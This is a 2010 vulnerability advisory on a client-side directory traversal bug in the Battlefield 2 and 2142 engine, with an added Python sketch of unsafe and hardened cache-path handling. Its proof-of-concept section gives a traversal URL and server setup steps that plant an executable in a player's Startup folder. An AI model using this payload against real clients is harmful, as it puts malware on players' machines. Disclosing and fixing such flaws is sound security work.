#######################################################################
Luigi Auriemma
Application: Refractor 2 engine
Games: Battlefield 2 <= 1.50 (aka 1.5.3153-802.0)
http://www.battlefield.ea.com/battlefield/bf2/
Battlefield 2142 <= 1.50 (aka 1.10.48.0)
http://battlefield.ea.com/battlefield/bf2142/
...
other games developed with the same engine could be
vulnerable like Battlefield Heroes
Platforms: Windows
Bug: client URLs directory traversal
Exploitation: remote, versus clients
Date: 29 Jun 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
The Battlefield series is one of the most famous and most played series
of games devoted to multiplayer gaming.
The series is developed by DICE (http://www.dice.se) and published by
Electronic Arts.
#######################################################################
======
2) Bug
======
Each BF2 and BF2142 server has some fields in which the admin can specify
links to files and images, such as the sponsor and community logos.
The sponsor logo is loaded as soon as the client gets the list of servers
and selects the server with the mouse (a single click, not a join), while
the community logo is loaded when the client joins that server.
There are also other URLs, like DemoDownloadURL, DemoIndexURL and
CustomMapsURL, that can be exploited when the client joins the malicious
server.
The client performs a very simple operation: it fetches the URL and
downloads the file, saving it locally under its original name in the
following folder:
C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache\SERVER
C:\Documents and Settings\USER\My Documents\Battlefield 2142\LogoCache\SERVER
where USER is the Windows account of the current user and SERVER is the
address of the web server; LogoCache is replaced by HttpCache when the
URLs for downloading demos and maps are used.
The vulnerability resides in the missing handling of the backslash
character, with the consequence that the file name can contain the
classic directory traversal pattern, allowing a malicious server to
place malicious executables on the clients.
Note that the loading of the URLs is automatic and it doesn't seem
possible to disable this feature.
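As an added illustration (not part of the advisory or of the game's code), the following Python models the unsafe file-name derivation described above next to a hardened version that treats the backslash like a separator, refuses dot segments and verifies that the final path still lies inside the cache root; the cache root and the URLs are constructed values.

```python
import ntpath
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Constructed cache root standing in for "...\Battlefield 2\LogoCache"
# (an assumption for the example, not the real install path).
CACHE_ROOT = r"C:\Users\player\Documents\Battlefield 2\LogoCache"

# One plain path component: no separator of either kind, no drive or
# UNC syntax, no dot-only name, bounded length.
_SAFE_COMPONENT = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def naive_cache_path(url: str, cache_root: str = CACHE_ROOT) -> str:
    """Model of the vulnerable behaviour: split the URL path on '/' only
    and keep the last piece verbatim, so '..\\' survives into the name."""
    parts = urlsplit(url)
    name = parts.path.rsplit("/", 1)[-1]
    return ntpath.normpath(ntpath.join(cache_root, parts.hostname or "", name))


def safe_cache_path(url: str, cache_root: str = CACHE_ROOT) -> Optional[str]:
    """Hardened version: the local path for the download, or None to refuse."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return None
    # Percent-decode before inspecting, so %5c or %2e%2e cannot hide a
    # separator or a dot segment from the checks below.
    path = unquote(parts.path)
    # Treat the backslash exactly like '/': the bug was not doing so.
    segments = path.replace("\\", "/").split("/")
    if any(seg in (".", "..") for seg in segments):
        return None
    name = segments[-1]
    if not _SAFE_COMPONENT.match(name) or not _SAFE_COMPONENT.match(host):
        return None
    # Defence in depth: after Windows-style normalisation the final path
    # must still lie under the cache root, whatever the checks above missed.
    root = ntpath.normpath(cache_root)
    final = ntpath.normpath(ntpath.join(root, host, name))
    if not final.startswith(root + ntpath.sep):
        return None
    return final
```

ntpath is used so the Windows path semantics are reproduced on any host OS.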
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/onlywebs.zip
- launch: onlywebs.exe c:\malicious_file.exe
- start the server launcher using the following string as the sponsor
and community logo URL:
http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe
- Save and Start the server
- launch the client and go to the multiplayer menu
- when the list has finished refreshing, select or join the malicious
server
- now the file owned.exe will be available in the Startup folder of the
client and will be executed at the next login or reboot
note that the server may not be visible if you run it on the same
machine as the client (127.0.0.1); in that case use another computer/VM
(a server or a UDP datapipe on port 29900)
#######################################################################
======
4) Fix
======
No fix.
#######################################################################